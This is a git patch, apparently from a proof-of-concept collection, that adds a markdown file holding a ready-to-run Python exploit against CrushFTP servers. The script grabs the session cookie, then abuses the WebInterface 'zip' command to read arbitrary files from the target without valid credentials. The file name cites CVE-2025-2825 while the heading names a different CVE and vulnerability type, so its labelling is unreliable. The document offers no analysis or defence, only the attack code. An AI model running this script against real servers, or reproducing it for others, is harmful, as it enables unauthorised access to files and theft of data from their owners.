From e7d58c6b097a842ceafa29973af20fed1f56729c Mon Sep 17 00:00:00 2001
From: Rainyseason <73454853+Rainyseason-c@users.noreply.github.com>
Date: Mon, 31 Mar 2025 14:53:36 +0800
Subject: [PATCH] =?UTF-8?q?Update=20and=20rename=20CrushFTP=E8=BA=AB?= =?UTF-8?q?=E4=BB=BD=E9=AA=8C=E8=AF=81=E7=BB=95=E8=BF=87(CVE-2025-2825)=20?= =?UTF-8?q?to=20CrushFTP=E8=BA=AB=E4=BB=BD=E9=AA=8C=E8=AF=81=E7=BB=95?= =?UTF-8?q?=E8=BF=87(CVE-2025-2825).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 .../CrushFTP身份验证绕过(CVE-2025-2825) | 1 -
 .../CrushFTP身份验证绕过(CVE-2025-2825).md | 60 +++++++++++++++++++
 2 files changed, 60 insertions(+), 1 deletion(-)
 delete mode 100644 wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825)
 create mode 100644 wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825).md
diff --git a/wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825) b/wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825)
deleted file mode 100644
index 8b13789..0000000
--- a/wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825)
+++ /dev/null
@@ -1 +0,0 @@
-
diff --git a/wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825).md b/wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825).md
new file mode 100644
index 0000000..425dae0
--- /dev/null
+++ b/wpoc/CrushFTP/CrushFTP身份验证绕过(CVE-2025-2825).md
@@ -0,0 +1,60 @@
+
+## CrushFTP服务器端模板注入(CVE-2024-4040)
+
+## poc
+```python
+import requests
+import argparse
+
+HEADER = '\033[95m'
+OKBLUE = '\033[94m'
+OKCYAN = '\033[96m'
+OKGREEN = '\033[92m'
+WARNING = '\033[93m'
+FAIL = '\033[91m'
+ENDC = '\033[0m'
+BOLD = '\033[1m'
+UNDERLINE = '\033[4m'
+
+def get_cookies(url):
+ try:
+ session = requests.Session()
+ response = session.get(url)
+ if response.status_code != 200:
+ raise Exception("Failed to connect to the server")
+ session.cookies.get_dict()
+ return session.cookies.get_dict()
+ except Exception as e:
+ print(FAIL + "Error: " + str(e) + ENDC)
+ quit()
+
+def exploit(url, cookies, path):
+ try:
+ if not path.startswith("/") or not path.endswith("/"):
+ raise Exception("Invalid path format. Path should start and end with '/'")
+ url = url + "/WebInterface/function/?command=zip&c2f=" + cookies['currentAuth'] + "&path=" + path + "&names=*"
+ response = requests.get(url, cookies=cookies)
+ if response.status_code != 200:
+ raise Exception("Failed to connect to the server")
+ return response.text
+ except Exception as e:
+ print(FAIL + "Error: " + str(e) + ENDC)
+ quit()
+
+if __name__ == "__main__":
+ parser = argparse.ArgumentParser()
+ parser.add_argument("-u", "--url", help="URL of the target", required=True)
+ parser.add_argument("-p", "--path", help="Path to the file to read", required=True)
+ args = parser.parse_args()
+ url = args.url
+ path = args.path
+ if not url.startswith("http"):
+ print(WARNING + "URL should start with 'http' or 'https'")
+ quit()
+ cookies = get_cookies(url)
+ if 'currentAuth' not in cookies:
+ print(WARNING + "Not vulnerable" + ENDC)
+ quit()
+ else:
+ print(OKCYAN + exploit(url, cookies, path) + ENDC)
+```